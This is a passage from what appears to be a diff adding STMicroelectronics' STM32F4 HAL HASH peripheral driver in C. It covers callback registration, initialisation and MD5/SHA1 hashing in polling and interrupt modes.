interruption-driven mode, it is suggested to the user to format the consecutive + chunks of data by software while the DMA transfer and processing is on-going for the first parts of + the message. Due to the 32-bit alignment required for the DMA transfer, it is underlined that the + software formatting operation is more complex than in the IT mode. + + *** Callback registration *** + =================================== + [..] + (#) The compilation define USE_HAL_HASH_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use function @ref HAL_HASH_RegisterCallback() to register a user callback. + + (#) Function @ref HAL_HASH_RegisterCallback() allows to register following callbacks: + (+) InCpltCallback : callback for input completion. + (+) DgstCpltCallback : callback for digest computation completion. + (+) ErrorCallback : callback for error. + (+) MspInitCallback : HASH MspInit. + (+) MspDeInitCallback : HASH MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + (#) Use function @ref HAL_HASH_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + @ref HAL_HASH_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) InCpltCallback : callback for input completion. + (+) DgstCpltCallback : callback for digest computation completion. + (+) ErrorCallback : callback for error. + (+) MspInitCallback : HASH MspInit. + (+) MspDeInitCallback : HASH MspDeInit. + + (#) By default, after the @ref HAL_HASH_Init and if the state is HAL_HASH_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions: + examples @ref HAL_HASH_InCpltCallback(), @ref HAL_HASH_DgstCpltCallback() + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_HASH_Init + and @ref HAL_HASH_DeInit only when these callbacks are null (not registered beforehand) + If not, MspInit or MspDeInit are not null, the @ref HAL_HASH_Init and @ref HAL_HASH_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_HASH_RegisterCallback before calling @ref HAL_HASH_DeInit + or @ref HAL_HASH_Init function. + + When The compilation define USE_HAL_HASH_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +#if defined (HASH) + +/** @defgroup HASH HASH + * @brief HASH HAL module driver. + * @{ + */ + +#ifdef HAL_HASH_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup HASH_Private_Constants HASH Private Constants + * @{ + */ + +/** @defgroup HASH_Digest_Calculation_Status HASH Digest Calculation Status + * @{ + */ +#define HASH_DIGEST_CALCULATION_NOT_STARTED ((uint32_t)0x00000000U) /*!< DCAL not set after input data written in DIN register */ +#define HASH_DIGEST_CALCULATION_STARTED ((uint32_t)0x00000001U) /*!< DCAL set after input data written in DIN register */ +/** + * @} + */ + +/** @defgroup HASH_Number_Of_CSR_Registers HASH Number of Context Swap Registers + * @{ + */ +#define HASH_NUMBER_OF_CSR_REGISTERS 54U /*!< Number of Context Swap Registers */ +/** + * @} + */ + +/** @defgroup HASH_TimeOut_Value HASH TimeOut Value + * @{ + */ +#define HASH_TIMEOUTVALUE 1000U /*!< Time-out value */ +/** + * @} + */ + +/** @defgroup HASH_DMA_Suspension_Words_Limit HASH DMA suspension words limit + * @{ + */ +#define HASH_DMA_SUSPENSION_WORDS_LIMIT 20U /*!< Number of words below which DMA suspension is aborted */ +/** + * @} + */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup HASH_Private_Functions HASH Private Functions + * @{ + */ +static void HASH_DMAXferCplt(DMA_HandleTypeDef *hdma); +static void HASH_DMAError(DMA_HandleTypeDef *hdma); +static void HASH_GetDigest(uint8_t *pMsgDigest, uint8_t Size); +static HAL_StatusTypeDef HASH_WaitOnFlagUntilTimeout(HASH_HandleTypeDef *hhash, uint32_t Flag, FlagStatus Status, + uint32_t Timeout); +static HAL_StatusTypeDef HASH_WriteData(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size); +static HAL_StatusTypeDef HASH_IT(HASH_HandleTypeDef *hhash); +static uint32_t HASH_Write_Block_Data(HASH_HandleTypeDef *hhash); +static HAL_StatusTypeDef HMAC_Processing(HASH_HandleTypeDef *hhash, uint32_t Timeout); +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions HASH Exported Functions + * @{ + */ + +/** @defgroup HASH_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization, configuration and call-back functions. + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the HASH according to the specified parameters + in the HASH_InitTypeDef and create the associated handle + (+) DeInitialize the HASH peripheral + (+) Initialize the HASH MCU Specific Package (MSP) + (+) DeInitialize the HASH MSP + + [..] This section provides as well call back functions definitions for user + code to manage: + (+) Input data transfer to Peripheral completion + (+) Calculated digest retrieval completion + (+) Error management + + + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the HASH according to the specified parameters in the + HASH_HandleTypeDef and create the associated handle. + * @note Only MDMAT and DATATYPE bits of HASH Peripheral are set by HAL_HASH_Init(), + * other configuration bits are set by HASH or HMAC processing APIs. + * @note MDMAT bit is systematically reset by HAL_HASH_Init(). To set it for + * multi-buffer HASH processing, user needs to resort to + * __HAL_HASH_SET_MDMAT() macro. For HMAC multi-buffer processing, the + * relevant APIs manage themselves the MDMAT bit. + * @param hhash HASH handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_Init(HASH_HandleTypeDef *hhash) +{ + /* Check the hash handle allocation */ + if (hhash == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_HASH_DATATYPE(hhash->Init.DataType)); + +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + if (hhash->State == HAL_HASH_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hhash->Lock = HAL_UNLOCKED; + + /* Reset Callback pointers in HAL_HASH_STATE_RESET only */ + hhash->InCpltCallback = HAL_HASH_InCpltCallback; /* Legacy weak (surcharged) input completion callback */ + hhash->DgstCpltCallback = HAL_HASH_DgstCpltCallback; /* Legacy weak (surcharged) digest computation + completion callback */ + hhash->ErrorCallback = HAL_HASH_ErrorCallback; /* Legacy weak (surcharged) error callback */ + if (hhash->MspInitCallback == NULL) + { + hhash->MspInitCallback = HAL_HASH_MspInit; + } + + /* Init the low level hardware */ + hhash->MspInitCallback(hhash); + } +#else + if (hhash->State == HAL_HASH_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hhash->Lock = HAL_UNLOCKED; + + /* Init the low level hardware */ + HAL_HASH_MspInit(hhash); + } +#endif /* (USE_HAL_HASH_REGISTER_CALLBACKS) */ + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Reset HashInCount, HashITCounter, HashBuffSize and NbWordsAlreadyPushed */ + hhash->HashInCount = 0; + hhash->HashBuffSize = 0; + hhash->HashITCounter = 0; + hhash->NbWordsAlreadyPushed = 0; + /* Reset digest calculation bridle (MDMAT bit control) */ + hhash->DigestCalculationDisable = RESET; + /* Set phase to READY */ + hhash->Phase = HAL_HASH_PHASE_READY; + /* Reset suspension request flag */ + hhash->SuspendRequest = HAL_HASH_SUSPEND_NONE; + + /* Set the data type bit */ + MODIFY_REG(HASH->CR, HASH_CR_DATATYPE, hhash->Init.DataType); +#if defined(HASH_CR_MDMAT) + /* Reset MDMAT bit */ + __HAL_HASH_RESET_MDMAT(); +#endif /* HASH_CR_MDMAT */ + /* Reset HASH handle status */ + hhash->Status = HAL_OK; + + /* Set the HASH state to Ready */ + hhash->State = HAL_HASH_STATE_READY; + + /* Initialise the error code */ + hhash->ErrorCode = HAL_HASH_ERROR_NONE; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief DeInitialize the HASH peripheral. + * @param hhash HASH handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_DeInit(HASH_HandleTypeDef *hhash) +{ + /* Check the HASH handle allocation */ + if (hhash == NULL) + { + return HAL_ERROR; + } + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Set the default HASH phase */ + hhash->Phase = HAL_HASH_PHASE_READY; + + /* Reset HashInCount, HashITCounter and HashBuffSize */ + hhash->HashInCount = 0; + hhash->HashBuffSize = 0; + hhash->HashITCounter = 0; + /* Reset digest calculation bridle (MDMAT bit control) */ + hhash->DigestCalculationDisable = RESET; + +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + if (hhash->MspDeInitCallback == NULL) + { + hhash->MspDeInitCallback = HAL_HASH_MspDeInit; + } + + /* DeInit the low level hardware */ + hhash->MspDeInitCallback(hhash); +#else + /* DeInit the low level hardware: CLOCK, NVIC */ + HAL_HASH_MspDeInit(hhash); +#endif /* (USE_HAL_HASH_REGISTER_CALLBACKS) */ + + + /* Reset HASH handle status */ + hhash->Status = HAL_OK; + + /* Set the HASH state to Ready */ + hhash->State = HAL_HASH_STATE_RESET; + + /* Initialise the error code */ + hhash->ErrorCode = HAL_HASH_ERROR_NONE; + + /* Reset multi buffers accumulation flag */ + hhash->Accumulation = 0U; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initialize the HASH MSP. + * @param hhash HASH handle. + * @retval None + */ +__weak void HAL_HASH_MspInit(HASH_HandleTypeDef *hhash) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* NOTE : This function should not be modified; when the callback is needed, + HAL_HASH_MspInit() can be implemented in the user file. + */ +} + +/** + * @brief DeInitialize the HASH MSP. + * @param hhash HASH handle. + * @retval None + */ +__weak void HAL_HASH_MspDeInit(HASH_HandleTypeDef *hhash) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* NOTE : This function should not be modified; when the callback is needed, + HAL_HASH_MspDeInit() can be implemented in the user file. + */ +} + +/** + * @brief Input data transfer complete call back. + * @note HAL_HASH_InCpltCallback() is called when the complete input message + * has been fed to the Peripheral. This API is invoked only when input data are + * entered under interruption or through DMA. + * @note In case of HASH or HMAC multi-buffer DMA feeding case (MDMAT bit set), + * HAL_HASH_InCpltCallback() is called at the end of each buffer feeding + * to the Peripheral. + * @param hhash HASH handle. + * @retval None + */ +__weak void HAL_HASH_InCpltCallback(HASH_HandleTypeDef *hhash) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* NOTE : This function should not be modified; when the callback is needed, + HAL_HASH_InCpltCallback() can be implemented in the user file. + */ +} + +/** + * @brief Digest computation complete call back. + * @note HAL_HASH_DgstCpltCallback() is used under interruption, is not + * relevant with DMA. + * @param hhash HASH handle. + * @retval None + */ +__weak void HAL_HASH_DgstCpltCallback(HASH_HandleTypeDef *hhash) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* NOTE : This function should not be modified; when the callback is needed, + HAL_HASH_DgstCpltCallback() can be implemented in the user file. + */ +} + +/** + * @brief Error callback. + * @note Code user can resort to hhash->Status (HAL_ERROR, HAL_TIMEOUT,...) + * to retrieve the error type. + * @param hhash HASH handle. + * @retval None + */ +__weak void HAL_HASH_ErrorCallback(HASH_HandleTypeDef *hhash) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* NOTE : This function should not be modified; when the callback is needed, + HAL_HASH_ErrorCallback() can be implemented in the user file. + */ +} + +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User HASH Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hhash HASH handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_HASH_INPUTCPLT_CB_ID HASH input completion Callback ID + * @arg @ref HAL_HASH_DGSTCPLT_CB_ID HASH digest computation completion Callback ID + * @arg @ref HAL_HASH_ERROR_CB_ID HASH error Callback ID + * @arg @ref HAL_HASH_MSPINIT_CB_ID HASH MspInit callback ID + * @arg @ref HAL_HASH_MSPDEINIT_CB_ID HASH MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_HASH_RegisterCallback(HASH_HandleTypeDef *hhash, HAL_HASH_CallbackIDTypeDef CallbackID, + pHASH_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hhash); + + if (HAL_HASH_STATE_READY == hhash->State) + { + switch (CallbackID) + { + case HAL_HASH_INPUTCPLT_CB_ID : + hhash->InCpltCallback = pCallback; + break; + + case HAL_HASH_DGSTCPLT_CB_ID : + hhash->DgstCpltCallback = pCallback; + break; + + case HAL_HASH_ERROR_CB_ID : + hhash->ErrorCallback = pCallback; + break; + + case HAL_HASH_MSPINIT_CB_ID : + hhash->MspInitCallback = pCallback; + break; + + case HAL_HASH_MSPDEINIT_CB_ID : + hhash->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_HASH_STATE_RESET == hhash->State) + { + switch (CallbackID) + { + case HAL_HASH_MSPINIT_CB_ID : + hhash->MspInitCallback = pCallback; + break; + + case HAL_HASH_MSPDEINIT_CB_ID : + hhash->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhash); + return status; +} + +/** + * @brief Unregister a HASH Callback + * HASH Callback is redirected to the weak (surcharged) predefined callback + * @param hhash HASH handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_HASH_INPUTCPLT_CB_ID HASH input completion Callback ID + * @arg @ref HAL_HASH_DGSTCPLT_CB_ID HASH digest computation completion Callback ID + * @arg @ref HAL_HASH_ERROR_CB_ID HASH error Callback ID + * @arg @ref HAL_HASH_MSPINIT_CB_ID HASH MspInit callback ID + * @arg @ref HAL_HASH_MSPDEINIT_CB_ID HASH MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_HASH_UnRegisterCallback(HASH_HandleTypeDef *hhash, HAL_HASH_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hhash); + + if (HAL_HASH_STATE_READY == hhash->State) + { + switch (CallbackID) + { + case HAL_HASH_INPUTCPLT_CB_ID : + hhash->InCpltCallback = HAL_HASH_InCpltCallback; /* Legacy weak (surcharged) input completion callback */ + break; + + case HAL_HASH_DGSTCPLT_CB_ID : + hhash->DgstCpltCallback = HAL_HASH_DgstCpltCallback; /* Legacy weak (surcharged) digest computation + completion callback */ + break; + + case HAL_HASH_ERROR_CB_ID : + hhash->ErrorCallback = HAL_HASH_ErrorCallback; /* Legacy weak (surcharged) error callback */ + break; + + case HAL_HASH_MSPINIT_CB_ID : + hhash->MspInitCallback = HAL_HASH_MspInit; /* Legacy weak (surcharged) Msp Init */ + break; + + case HAL_HASH_MSPDEINIT_CB_ID : + hhash->MspDeInitCallback = HAL_HASH_MspDeInit; /* Legacy weak (surcharged) Msp DeInit */ + break; + + default : + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_HASH_STATE_RESET == hhash->State) + { + switch (CallbackID) + { + case HAL_HASH_MSPINIT_CB_ID : + hhash->MspInitCallback = HAL_HASH_MspInit; /* Legacy weak (surcharged) Msp Init */ + break; + + case HAL_HASH_MSPDEINIT_CB_ID : + hhash->MspDeInitCallback = HAL_HASH_MspDeInit; /* Legacy weak (surcharged) Msp DeInit */ + break; + + default : + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hhash->ErrorCode |= HAL_HASH_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhash); + return status; +} +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions_Group2 HASH processing functions in polling mode + * @brief HASH processing functions using polling mode. + * +@verbatim + =============================================================================== + ##### Polling mode HASH processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in polling mode + the hash value using one of the following algorithms: + (+) MD5 + (++) HAL_HASH_MD5_Start() + (++) HAL_HASH_MD5_Accmlt() + (++) HAL_HASH_MD5_Accmlt_End() + (+) SHA1 + (++) HAL_HASH_SHA1_Start() + (++) HAL_HASH_SHA1_Accmlt() + (++) HAL_HASH_SHA1_Accmlt_End() + + [..] For a single buffer to be hashed, user can resort to HAL_HASH_xxx_Start(). + + [..] In case of multi-buffer HASH processing (a single digest is computed while + several buffers are fed to the Peripheral), the user can resort to successive calls + to HAL_HASH_xxx_Accumulate() and wrap-up the digest computation by a call + to HAL_HASH_xxx_Accumulate_End(). + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the HASH peripheral in MD5 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief If not already done, initialize the HASH peripheral in MD5 mode then + * processes pInBuffer. + * @note Consecutive calls to HAL_HASH_MD5_Accmlt() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASH_MD5_Accmlt_End(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note Digest is not retrieved by this API, user must resort to HAL_HASH_MD5_Accmlt_End() + * to read it, feeding at the same time the last input buffer to the Peripheral. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASH_MD5_Accmlt_End() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Accmlt(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASH_MD5_Accmlt() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Accmlt_End(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief Initialize the HASH peripheral in SHA1 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief If not already done, initialize the HASH peripheral in SHA1 mode then + * processes pInBuffer. + * @note Consecutive calls to HAL_HASH_SHA1_Accmlt() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASH_SHA1_Accmlt_End(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note Digest is not retrieved by this API, user must resort to HAL_HASH_SHA1_Accmlt_End() + * to read it, feeding at the same time the last input buffer to the Peripheral. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASH_SHA1_Accmlt_End() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Accmlt(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASH_SHA1_Accmlt() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Accmlt_End(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA1); +} + +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions_Group3 HASH processing functions in interrupt mode + * @brief HASH processing functions using interrupt mode. + * +@verbatim + =============================================================================== + ##### Interruption mode HASH processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in interrupt mode + the hash value using one of the following algorithms: + (+) MD5 + (++) HAL_HASH_MD5_Start_IT() + (++) HAL_HASH_MD5_Accmlt_IT() + (++) HAL_HASH_MD5_Accmlt_End_IT() + (+) SHA1 + (++) HAL_HASH_SHA1_Start_IT() + (++) HAL_HASH_SHA1_Accmlt_IT() + (++) HAL_HASH_SHA1_Accmlt_End_IT() + + [..] API HAL_HASH_IRQHandler() manages each HASH interruption. + + [..] Note that HAL_HASH_IRQHandler() manages as well HASH Peripheral interruptions when in + HMAC processing mode. + + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the HASH peripheral in MD5 mode, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief If not already done, initialize the HASH peripheral in MD5 mode then + * processes pInBuffer in interruption mode. + * @note Consecutive calls to HAL_HASH_MD5_Accmlt_IT() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASH_MD5_Accmlt_End_IT(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASH_MD5_Accmlt_End_IT() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Accmlt_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate_IT(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASH_MD5_Accmlt_IT() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Accmlt_End_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief Initialize the HASH peripheral in SHA1 mode, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA1); +} + + +/** + * @brief If not already done, initialize the HASH peripheral in SHA1 mode then + * processes pInBuffer in interruption mode. + * @note Consecutive calls to HAL_HASH_SHA1_Accmlt_IT() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASH_SHA1_Accmlt_End_IT(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASH_SHA1_Accmlt_End_IT() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Accmlt_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate_IT(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASH_SHA1_Accmlt_IT() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Accmlt_End_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief Handle HASH interrupt request. + * @param hhash HASH handle. + * @note HAL_HASH_IRQHandler() handles interrupts in HMAC processing as well. + * @note In case of error reported during the HASH interruption processing, + * HAL_HASH_ErrorCallback() API is called so that user code can + * manage the error. The error type is available in hhash->Status field. + * @retval None + */ +void HAL_HASH_IRQHandler(HASH_HandleTypeDef *hhash) +{ + hhash->Status = HASH_IT(hhash); + if (hhash->Status != HAL_OK) + { + hhash->ErrorCode |= HAL_HASH_ERROR_IT; +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->ErrorCallback(hhash); +#else + HAL_HASH_ErrorCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + /* After error handling by code user, reset HASH handle HAL status */ + hhash->Status = HAL_OK; + } +} + +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions_Group4 HASH processing functions in DMA mode + * @brief HASH processing functions using DMA mode. + * +@verbatim + =============================================================================== + ##### DMA mode HASH processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in DMA mode + the hash value using one of the following algorithms: + (+) MD5 + (++) HAL_HASH_MD5_Start_DMA() + (++) HAL_HASH_MD5_Finish() + (+) SHA1 